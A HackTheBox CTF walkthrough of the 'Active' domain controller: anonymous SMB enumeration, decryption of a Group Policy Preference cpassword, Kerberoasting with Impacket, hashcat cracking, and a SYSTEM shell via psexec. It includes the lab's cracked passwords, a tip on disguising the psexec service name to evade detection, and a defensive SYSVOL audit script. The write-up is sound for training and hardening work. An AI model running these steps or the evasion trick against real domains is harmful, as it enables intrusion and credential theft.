Active — A Kerberos and Active Directory HackTheBox Walkthrough

Mitch Moser
Dec 10, 2018 · 3 min read

Summary

Active is a Windows Active Directory server that exposed a Groups.xml file in an SMB share readable through anonymous logon. This file contained a Group Policy Preference (cpassword) credential for a service account, which was decrypted in order to gain access to that account and read the user flag.

Privileges were escalated by requesting the Service Principal Names associated with user accounts and retrieving a Kerberos 5 TGS hash for the Administrator account. This hash was cracked and the recovered password granted read/write access to the filesystem as well as an interactive shell via arbitrary service installation and execution with tools such as psexec.

Recon

I began recon on this host with an nmap scan checking Service Versions and running Default Scripts on the top 1000 most common ports:

nmap -sV -sC 10.10.10.100
[Screenshot: nmap -sV -sC output]

This returned a large number of open ports. Since DNS, Kerberos, and LDAP were among the myriad of services on this machine, it appeared to be a Domain Controller. Few of these services allowed direct user interaction, and because the default scripts gathered little information about SMB on port 445, that was the next target for enumeration on the host.

smbclient -L //10.10.10.100 -N

-L — list shares

-N — anonymous logon

[Screenshot: SMB shares]

Again, this simple enumeration step returned several findings. A quick way to view access to multiple SMB shares is through a tool called smbmap:

smbmap -H 10.10.10.100
[Screenshot: smbmap output]

After some review, the Replication share returned a Groups.xml file at the path:

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

Reviewing the contents of this file:

[Screenshot: Groups.xml contents]

Initial Foothold

The file contains the username active.htb\SVC_TGS together with a cpassword attribute holding that account's AES-encrypted password. Because the AES key is published in Microsoft's own documentation, several tools exist to decrypt these values, including a function that I extracted from PowerSploit in order to decrypt this one:

[Screenshot: Get-DecryptedCpassword function]

This function receives a Group Policy Preference password as a command-line argument and returns the plaintext string. This even works in PowerShell Core on macOS!

[Screenshot: Get-DecryptedCpassword on PowerShell Core]

Luckily there is also a built-in tool that ships with Kali to decrypt this password, called gpp-decrypt:

[Screenshot: gpp-decrypt output]

Either method returns the same password. With these credentials, the SVC_TGS account can access the Users share and read the user.txt flag.
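As an added, defender-side example (not the walkthrough's own code), the following Python audits a SYSVOL tree for any Group Policy Preference item that still carries a cpassword attribute, the condition that made this foothold possible. The Groups.xml content and the cpassword value are constructed placeholders; the only real values are the file layout and the Default Domain Policy GUID from the path above.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword attribute (the MS14-025 set).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

def find_cpasswords(sysvol_root):
    """Return (relative path, item tag, account, cpassword) for every GPP item that stores a credential."""
    findings = []
    for dirpath, _, filenames in os.walk(sysvol_root):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            full = os.path.join(dirpath, name)
            try:
                root = ET.parse(full).getroot()
            except ET.ParseError:
                continue  # malformed file: skip it rather than abort the audit
            # Each item (User, Group, NTService, Task, ...) has a <Properties> child carrying cpassword.
            for item in root:
                props = item.find("Properties")
                if props is None or props.get("cpassword") is None:
                    continue
                account = (props.get("userName") or props.get("accountName")
                           or props.get("runAs") or "")
                findings.append((os.path.relpath(full, sysvol_root),
                                 item.tag, account, props.get("cpassword")))
    return findings

# Constructed sample in the layout the walkthrough found; the cpassword value
# is a placeholder, not a real encrypted password.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="PLACEHOLDER-NOT-A-REAL-CPASSWORD"
                userName="active.htb\\SVC_TGS"/>
  </User>
  <Group name="Administrators (built-in)"><Properties action="U"/></Group>
</Groups>"""

def audit_sample():
    # Write the sample into a temporary SYSVOL-like tree and audit it.
    with tempfile.TemporaryDirectory() as sysvol:
        gpo_dir = os.path.join(sysvol, "Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                               "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo_dir)
        with open(os.path.join(gpo_dir, "Groups.xml"), "w", encoding="utf-8") as f:
            f.write(SAMPLE_GROUPS_XML)
        return find_cpasswords(sysvol)
```

Run find_cpasswords against a copy of \\domain\SYSVOL to list every GPO that still needs the credential removed; an empty result means no preference item stores a password.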

Privilege Escalation

The active.htb\SVC_TGS account is able to find Service Principal Names associated with user accounts and request service tickets for them using the GetUserSPNs.py module of Impacket. The following command lists the Administrator account and requests a ticket for it:

./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

-dc-ip — IP Address of the domain controller

-request — Requests a TGS for each user and outputs it in JtR/hashcat format

[Screenshot: GetUserSPNs.py output]

This returned a Kerberos 5 TGS hash which can be cracked by hashcat using the rockyou.txt wordlist along with the following arguments:

hashcat -m 13100 -d 3 -a 0 -o Active.txt Administrator.hash rockyou.dict

The cracked password is written into Active.txt. Reading the file returns the plaintext password Ticketmaster1968. These credentials can be used to access the root.txt flag.

An interactive shell can be gained using tools such as psexec. Many tools which operate similarly to psexec such as the module in Impacket allow the service which is installed and removed to be named. Choosing a service name for something that may be expected to get deleted shortly after installation such as an update to an Antivirus Client is a simple step that may assist in avoiding detection.

./psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100 -service-name LUALL.exe
[Screenshot: Interactive shell as SYSTEM]

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Mitch Moser

Written by

digital brain | analog heart

InfoSec Write-ups
